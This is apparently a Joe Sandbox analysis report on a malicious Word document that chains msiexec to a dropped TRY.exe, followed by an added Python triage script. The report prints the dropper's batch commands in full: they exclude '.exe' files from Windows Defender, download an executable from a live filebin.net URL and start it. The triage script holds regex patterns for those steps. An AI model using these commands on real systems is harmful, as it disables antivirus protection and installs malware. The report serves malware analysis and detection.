Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB612C0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB68114 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB629E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
MITRE ATT&CK Matrix (listed per tactic; a bracketed number is the count of matching signatures for that technique)

Initial Access: Replication Through Removable Media [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application

Execution: Scripting [21]; Native API [2]; Exploitation for Client Execution [3]; Command and Scripting Interpreter [1]; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell

Persistence: Registry Run Keys / Startup Folder [1]; Services File Permissions Weakness [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)

Privilege Escalation: Access Token Manipulation [1]; Process Injection [11]; Registry Run Keys / Startup Folder [1]; Services File Permissions Weakness [1]; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)

Defense Evasion: Scripting [21]; File Deletion [1]; Masquerading [21]; Modify Registry [1]; Virtualization/Sandbox Evasion [21]; Access Token Manipulation [1]; Process Injection [11]; Services File Permissions Weakness [1]; Rundll32 [1]

Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow

Discovery: System Time Discovery [1]; Peripheral Device Discovery [11]; File and Directory Discovery [4]; System Information Discovery [17]; Query Registry [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [21]; Remote System Discovery [1]; System Network Connections Discovery

Lateral Movement: Replication Through Removable Media [1]; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools

Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Command and Control: Ingress Tool Transfer [2]; Encrypted Channel [21]; Non-Application Layer Protocol [2]; Application Layer Protocol [3]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station

Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups

Impact: System Shutdown/Reboot [1]; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
Behavior Graph (ID: 611840, Sample: 12543_0008858249_FWDOUTSTAN..., Start date: 20/04/2022, Architecture: WINDOWS, Score: 76)

Signatures on the sample node: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 3 other signatures

Process tree recovered from the graph:
  • WINWORD.EXE (started)
      dropped: C:\Users\user\...\~DFC2FF7A9553E7F48E.TMP (Composite)
  • rundll32.exe (started)
  • msiexec.exe (started)
      DNS/IP: filebin.net 185.47.40.36, 443, 49173, REDPILL-LINPRORedpillLinproNO, Norway
      DNS/IP: situla.bitbit.net 87.238.33.8, 443, 49174, REDPILL-LINPRORedpillLinproNO, Norway
      dropped: C:\Windows\Installer\MSI9F1.tmp (PE32)
      • msiexec.exe (started)
          • TRY.exe (started)
              • cmd.exe (started)
                  • powershell.exe (started)
                  • powershell.exe (started)
          • expand.exe (started)
              dropped: C:\Users\user\AppData\...\TRY.exe (copy) (PE32+)
              dropped: C:\...\79bd875a22ddb24abfa2594fbd40eccf.tmp (PE32+)
          • icacls.exe (started)
          • icacls.exe (started)

Antivirus detection, submitted file (Source | Detection | Scanner | Label):
12543_0008858249_FWDOUTSTANDING_20200604.doc | 38% | Virustotal | -
12543_0008858249_FWDOUTSTANDING_20200604.doc | 24% | ReversingLabs | Win32.Downloader.Mutisedow
12543_0008858249_FWDOUTSTANDING_20200604.doc | 100% | Joe Sandbox ML | -

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Temp\~DFC2FF7A9553E7F48E.TMP | 100% | Joe Sandbox ML | -
C:\Windows\Installer\MSI9F1.tmp | 0% | Metadefender | -
C:\Windows\Installer\MSI9F1.tmp | 0% | ReversingLabs | -

No Antivirus matches

Antivirus detection, domains (Source | Detection | Scanner | Label):
filebin.net | 5% | Virustotal | -
situla.bitbit.net | 1% | Virustotal | -

Antivirus detection, URLs (Source | Detection | Scanner | Label):
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470 | 100% | Avira URL Cloud | malware
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi | 100% | Avira URL Cloud | malware
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe | 100% | Avira URL Cloud | malware
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C: | 100% | Avira URL Cloud | malware
https://filebin.net/rf43v6qzghbj7h7b/ | 100% | Avira URL Cloud | malware
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
filebin.net | 185.47.40.36 | true | true | - | unknown
situla.bitbit.net | 87.238.33.8 | true | false | - | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi | true | Avira URL Cloud: malware | unknown

URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi-1261261808309546470 | ~DFECA159C20646BB57.TMP.2.dr | true | Avira URL Cloud: malware | unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.exe | expand.exe, 00000007.00000003.919683562.00000000003CF000.00000004.00000800.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927628947.0000000001E20000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000003.927698970.0000000002020000.00000004.00000020.00020000.00000000.sdmp, TRY.exe, 00000009.00000000.925076387.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945747952.0000000000286000.00000004.00000020.00020000.00000000.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, thai.bat.9.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr | true | Avira URL Cloud: malware | unknown
https://filebin.net/rf43v6qzghbj7h7b/TRY.msi0C: | 535fae.ipi.2.dr | true | Avira URL Cloud: malware | unknown
https://filebin.net/rf43v6qzghbj7h7b/ | ~DFECA159C20646BB57.TMP.2.dr | true | Avira URL Cloud: malware | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
87.238.33.8 | situla.bitbit.net | Norway | 39029 | REDPILL-LINPRORedpillLinproNO | false
185.47.40.36 | filebin.net | Norway | 39029 | REDPILL-LINPRORedpillLinproNO | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 611840
Start date and time: 2022-04-20 09:18:03 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 35s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 12543_0008858249_FWDOUTSTANDING_20200604.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal76.expl.winDOC@19/23@5/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 58.5%)
  • Quality average: 35.5%
  • Quality standard deviation: 35.4%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 24
  • Number of non-executed functions: 32
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Found warning dialog
  • Click Ok
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, conhost.exe
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryAttributesFile calls found.
Time | Type | Description
09:19:15 | API Interceptor | 1365x Sleep call for process: msiexec.exe modified
09:19:24 | API Interceptor | 1x Sleep call for process: icacls.exe modified
09:19:31 | API Interceptor | 31x Sleep call for process: powershell.exe modified
09:19:36 | API Interceptor | 17x Sleep call for process: cmd.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
87.238.33.82543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
    SWIFT pagesa .docGet hashmaliciousBrowse
      SWIFT pagesa .docGet hashmaliciousBrowse
        SWIFT pagesa .docGet hashmaliciousBrowse
          Shahini Ferramenta.docGet hashmaliciousBrowse
            DHL NOTIFICATION.docGet hashmaliciousBrowse
              DHL NOTIFICATION.docGet hashmaliciousBrowse
                oZPv3ngzrx.exeGet hashmaliciousBrowse
                  185.47.40.362543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                    2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                      2543_0008858249_FWDOUTSTANDING_20210420.docGet hashmaliciousBrowse
                        SWIFT pagesa .docGet hashmaliciousBrowse
                          SWIFT pagesa .docGet hashmaliciousBrowse
                            SWIFT pagesa .docGet hashmaliciousBrowse
                              Holdings.docGet hashmaliciousBrowse
                                Holdings.docGet hashmaliciousBrowse
                                  Shahini Ferramenta.docGet hashmaliciousBrowse
                                    Shahini Ferramenta.docGet hashmaliciousBrowse
                                      DHL NOTIFICATION.docGet hashmaliciousBrowse
                                        DHL NOTIFICATION.docGet hashmaliciousBrowse
                                          oZPv3ngzrx.exeGet hashmaliciousBrowse
                                            876Vfmj5EI.exeGet hashmaliciousBrowse
                                              876Vfmj5EI.exeGet hashmaliciousBrowse
                                                https://filebin.net/nupvt5rvu70bzfbr/Merrittbudgetup8.17.17.htm?t=jg2rhjrsGet hashmaliciousBrowse
                                                  https://filebin.net/0cgidc8y2xs3eihd/IOTAWORK.PDF.htm?t=yg85ijwnGet hashmaliciousBrowse
                                                    PO 91277.docGet hashmaliciousBrowse
Match               Associated Sample Name / URL                  Detection   Context
situla.bitbit.net   2543_0008858249_FWDOUTSTANDING_20210420.doc   malicious   87.238.33.7
                    2543_0008858249_FWDOUTSTANDING_20210420.doc   malicious   87.238.33.7
                    2543_0008858249_FWDOUTSTANDING_20210420.doc   malicious   87.238.33.8
                    SWIFT pagesa .doc                             malicious   87.238.33.8
                    SWIFT pagesa .doc                             malicious   87.238.33.8
                    SWIFT pagesa .doc                             malicious   87.238.33.8
                    Holdings.doc                                  malicious   87.238.33.7
                    Holdings.doc                                  malicious   87.238.33.7
                    Shahini Ferramenta.doc                        malicious   87.238.33.8
                    Shahini Ferramenta.doc                        malicious   87.238.33.7
                    DHL NOTIFICATION.doc                          malicious   87.238.33.8
                    DHL NOTIFICATION.doc                          malicious   87.238.33.8
                    oZPv3ngzrx.exe                                malicious   87.238.33.7
filebin.net         2543_0008858249_FWDOUTSTANDING_20210420.doc   malicious   185.47.40.36
                    2543_0008858249_FWDOUTSTANDING_20210420.doc   malicious   185.47.40.36
                    2543_0008858249_FWDOUTSTANDING_20210420.doc   malicious   185.47.40.36
                    SWIFT pagesa .doc                             malicious   185.47.40.36
                    SWIFT pagesa .doc                             malicious   185.47.40.36
                    SWIFT pagesa .doc                             malicious   185.47.40.36
                    Holdings.doc                                  malicious   185.47.40.36
                    Holdings.doc                                  malicious   185.47.40.36
                    Shahini Ferramenta.doc                        malicious   185.47.40.36
                    Shahini Ferramenta.doc                        malicious   185.47.40.36
                    DHL NOTIFICATION.doc                          malicious   185.47.40.36
                    DHL NOTIFICATION.doc                          malicious   185.47.40.36
                    oZPv3ngzrx.exe                                malicious   185.47.40.36
                    876Vfmj5EI.exe                                malicious   185.47.40.36
                    876Vfmj5EI.exe                                malicious   185.47.40.36
                    Zm1Oz6lCLO.exe                                malicious   185.47.40.36
                    RYDdv7X9e8.exe                                malicious   185.47.40.36
                    gPm4nLttxA.exe                                malicious   185.47.40.36
                    tVzelearRj.exe                                malicious   185.47.40.36
                    4viHjPSIXn.exe                                malicious   185.47.40.36
Match (ASN)                      Associated Sample Name / URL                                               Detection   Context
REDPILL-LINPRORedpillLinproNO    2543_0008858249_FWDOUTSTANDING_20210420.doc                                malicious   87.238.33.7
                                 2543_0008858249_FWDOUTSTANDING_20210420.doc                                malicious   87.238.33.7
                                 2543_0008858249_FWDOUTSTANDING_20210420.doc                                malicious   185.47.40.36
                                 SWIFT pagesa .doc                                                          malicious   185.47.40.36
                                 SWIFT pagesa .doc                                                          malicious   185.47.40.36
                                 SWIFT pagesa .doc                                                          malicious   185.47.40.36
                                 Holdings.doc                                                               malicious   87.238.33.7
                                 Holdings.doc                                                               malicious   87.238.33.7
                                 Shahini Ferramenta.doc                                                     malicious   185.47.40.36
                                 Shahini Ferramenta.doc                                                     malicious   87.238.33.7
                                 DHL NOTIFICATION.doc                                                       malicious   185.47.40.36
                                 DHL NOTIFICATION.doc                                                       malicious   185.47.40.36
                                 oZPv3ngzrx.exe                                                             malicious   87.238.33.7
                                 876Vfmj5EI.exe                                                             malicious   185.47.40.36
                                 876Vfmj5EI.exe                                                             malicious   185.47.40.36
                                 https://filebin.net/nupvt5rvu70bzfbr/Merrittbudgetup8.17.17.htm?t=jg2rhjrs   malicious   185.47.40.36
                                 https://filebin.net/0cgidc8y2xs3eihd/IOTAWORK.PDF.htm?t=yg85ijwn           malicious   185.47.40.36
Match (JA3 fingerprint)             Associated Sample Name / URL                   Detection   Context
05af1f5ca1b87cc9cc9b25185115607d    2543_0008858249_FWDOUTSTANDING_20210420.doc    malicious   185.47.40.36, 87.238.33.8
                                    2543_0008858249_FWDOUTSTANDING_20210420.doc    malicious   185.47.40.36, 87.238.33.8
                                    3.ppam                                         malicious   185.47.40.36, 87.238.33.8
                                    UT.dot                                         malicious   185.47.40.36, 87.238.33.8
                                    WNBHXO.doc                                     malicious   185.47.40.36, 87.238.33.8
                                    NALC-salaries.xls                              malicious   185.47.40.36, 87.238.33.8
                                    Form.doc                                       malicious   185.47.40.36, 87.238.33.8
                                    42#U0440.xls                                   malicious   185.47.40.36, 87.238.33.8
                                    14.ppam                                        malicious   185.47.40.36, 87.238.33.8
                                    ba#U011f#U0131#U015f sertifikas#U0131.xlsx     malicious   185.47.40.36, 87.238.33.8
                                    14.ppam                                        malicious   185.47.40.36, 87.238.33.8
                                    PO16101545739.docx                             malicious   185.47.40.36, 87.238.33.8
                                    Final Purchase Order_0422.ppam                 malicious   185.47.40.36, 87.238.33.8
                                    SP_04132022.docx                               malicious   185.47.40.36, 87.238.33.8
                                    Final Purchase Order_0422.ppam                 malicious   185.47.40.36, 87.238.33.8
                                    PO-8MMM-TSO.docx                               malicious   185.47.40.36, 87.238.33.8
                                    #U043e#U0444#U0435#U0440#U0442#U043022.xlsx    malicious   185.47.40.36, 87.238.33.8
                                    00000051.doc                                   malicious   185.47.40.36, 87.238.33.8
                                    Commande HILTI MAROC.xlsx                      malicious   185.47.40.36, 87.238.33.8
                                    SWIFT pagesa .doc                              malicious   185.47.40.36, 87.238.33.8
Match (dropped file)    Associated Sample Name / URL                   Detection
C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)
                        2543_0008858249_FWDOUTSTANDING_20210420.doc    malicious
                        2543_0008858249_FWDOUTSTANDING_20210420.doc    malicious
                        2543_0008858249_FWDOUTSTANDING_20210420.doc    malicious
C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmp
                        2543_0008858249_FWDOUTSTANDING_20210420.doc    malicious
                        2543_0008858249_FWDOUTSTANDING_20210420.doc    malicious
                        2543_0008858249_FWDOUTSTANDING_20210420.doc    malicious
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):9216
                                                                  Entropy (8bit):4.161759538213247
                                                                  Encrypted:false
                                                                  SSDEEP:96:6/4AVtYE5uI3U33ZsYEFL2l4oK3B24CxkZFivEwj98l1vu+X0jUrw62tbaAGi7A:6/4AVtF368vB27xkZF5P50jcw60aWA
                                                                  MD5:D295AD2809D07DCE046748F3AF1C5035
                                                                  SHA1:9E774C670AB933D4E984EFCE44B815781FDDCB5A
                                                                  SHA-256:BC4DCE07AAA38FFD6445499BFF0DA6C48F5400C2A7FAA04B3F5BE2D273DE319E
                                                                  SHA-512:9E7F25992E9B672FF95802703EDB822737BFCAF61425910B3DE80304AAD18D562FD270928EC68EA370E5604AF037A2BF0897D8AFFC87ABAAA6D3D94F202BEAC0
                                                                  Malicious:false
                                                                  Yara Hits:
                                                                  • Rule: SUSP_Doc_WindowsInstaller_Call_Feb22_1, Description: Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp, Author: Nils Kuhnert
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1024
                                                                  Entropy (8bit):0.05390218305374581
                                                                  Encrypted:false
                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe
                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):192
                                                                  Entropy (8bit):5.038473612824116
                                                                  Encrypted:false
                                                                  SSDEEP:3:mKDDGKSSJJFIGtxVfHeGAFddGeWLERy44ASVOGSJJFIGtATH3x85MHVWfILGYgPe:hSG8G3V/eGgdEWRy44ASQ98GSLh8uWfi
                                                                  MD5:0187F7CF14FF509BAFFEEDC6909AEF04
                                                                  SHA1:01689D0CD0070F66D2FA1465E79C43641A52574D
                                                                  SHA-256:C63EB9290E361D2474C8C8EA29869CA413005CC033146B54E30C3363C5B81170
                                                                  SHA-512:63C8B8F1214172258D137FBD166912A17053A032CCFBE188E71369A10D4D8F5F8CF97A109BC7E0C8DE19EADF7A29855A224C2092887191F8F38974012BB66F2F
                                                                  Malicious:false
Preview (DOS batch file; the CRLF line breaks that the raw preview renders as ".." are restored):
@echo off
powershell -command "Set-MpPreference -ExclusionExtension ".exe"
powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
start TRY.exe
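Added example (not part of the Joe Sandbox report and not code from the sample): a small triage script for batch droppers of the kind previewed above. It scans each line for the three behaviours this one chains: adding an extension to Defender's exclusions with Set-MpPreference, fetching a payload with Invoke-WebRequest, and starting the downloaded file, and it reports whether the exclusion precedes the download and whether a downloaded file is later executed. The sample text is reconstructed from the preview with CRLF restored (it comes to exactly 192 bytes, the size the report gives for the dropped file); the benign control script, the regular expressions and the function names are this example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the dropped batch file from the report, CRLF restored, no trailing newline.
SAMPLE_BATCH = (
    '@echo off\r\n'
    'powershell -command "Set-MpPreference -ExclusionExtension ".exe"\r\n'
    'powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"\r\n'
    'start TRY.exe'
)

# Constructed benign control: PowerShell plus a start command, but no tampering and no download.
BENIGN_BATCH = (
    '@echo off\r\n'
    'powershell -command "Get-Date"\r\n'
    'start notepad.exe README.txt\r\n'
)

# Defender tampering: Set-/Add-MpPreference with any exclusion switch and its value.
EXCLUSION_RE = re.compile(
    r'\b(?:Set|Add)-MpPreference\b.*?-(Exclusion(?:Extension|Path|Process|IpAddress))\s+"?([^"\s]+)',
    re.IGNORECASE)
# Download to disk: Invoke-WebRequest (or alias) with a URI and an output file (-o / -OutFile).
DOWNLOAD_RE = re.compile(
    r'\b(?:Invoke-WebRequest|iwr|curl|wget)\b.*?-uri\s+"?([^"\s]+).*?-(?:o|outfile)\s+"?([^"\s]+)',
    re.IGNORECASE)
# Execution: "start" or "call" at the start of a line; skips an empty window title and /switches.
START_RE = re.compile(r'^\s*(?:start|call)\s+(?:""\s+)?(?:/\w+\s+)*"?([^"\s]+)', re.IGNORECASE)


def triage_batch(text: str) -> Dict[str, object]:
    """Return the indicators found in a batch script and how they chain together."""
    exclusions: List[Tuple[int, str, str]] = []  # (line, switch, value)
    downloads: List[Tuple[int, str, str]] = []   # (line, url, output file)
    executions: List[Tuple[int, str]] = []       # (line, program)
    for lineno, line in enumerate(text.splitlines(), 1):
        m = EXCLUSION_RE.search(line)
        if m:
            exclusions.append((lineno, m.group(1), m.group(2)))
        m = DOWNLOAD_RE.search(line)
        if m:
            downloads.append((lineno, m.group(1), m.group(2)))
        m = START_RE.match(line)
        if m:
            executions.append((lineno, m.group(1)))
    # Download-and-execute: a file written by a download is started on a later line.
    chain = [(d_line, url, out, x_line)
             for d_line, url, out in downloads
             for x_line, prog in executions
             if x_line > d_line and prog.lower().endswith(out.lower())]
    # The exclusion matters when it comes before the download and covers the payload
    # (an ExclusionExtension must match the output file's extension; other switches count as-is).
    evasion_first = any(
        e_line < d_line and (switch.lower() != "exclusionextension" or out.lower().endswith(value.lower()))
        for e_line, switch, value in exclusions
        for d_line, _url, out in downloads)
    return {"exclusions": exclusions, "downloads": downloads, "executions": executions,
            "chain": chain, "evasion_before_download": evasion_first}


if __name__ == "__main__":
    for label, script in (("dropped batch", SAMPLE_BATCH), ("benign control", BENIGN_BATCH)):
        print(label, triage_batch(script))
```

The same patterns apply to process command lines (Sysmon event 1 or 4688) as well as to files on disk; the ordering check is what separates this dropper from an administrator legitimately adding an exclusion and separately downloading a tool.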
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:Microsoft Cabinet archive data, 155244 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):155244
                                                                  Entropy (8bit):6.820072420859643
                                                                  Encrypted:false
                                                                  SSDEEP:3072:avGygixtiq1P5GWp/icKAArDZz4/9GhbkrNEO1Yq:eUEpKy/90QEc
                                                                  MD5:2A683F9BE589B6F5581EA6298C95AFBC
                                                                  SHA1:B78112E20E2E465B58D803BF93ED458FE8492161
                                                                  SHA-256:8A64B66F67D4C199154659B5BB448173B46C1ADB1B2F9AE24CEFF17C858B96D5
                                                                  SHA-512:731B78A6DAABD45E375681F6CE60FD42A429C655EE93784B4599DDE78936DB307370A96D64F6B289DBDBA033F18B192F6DD47720E4976F6ABF5B49B3490348D9
                                                                  Malicious:false
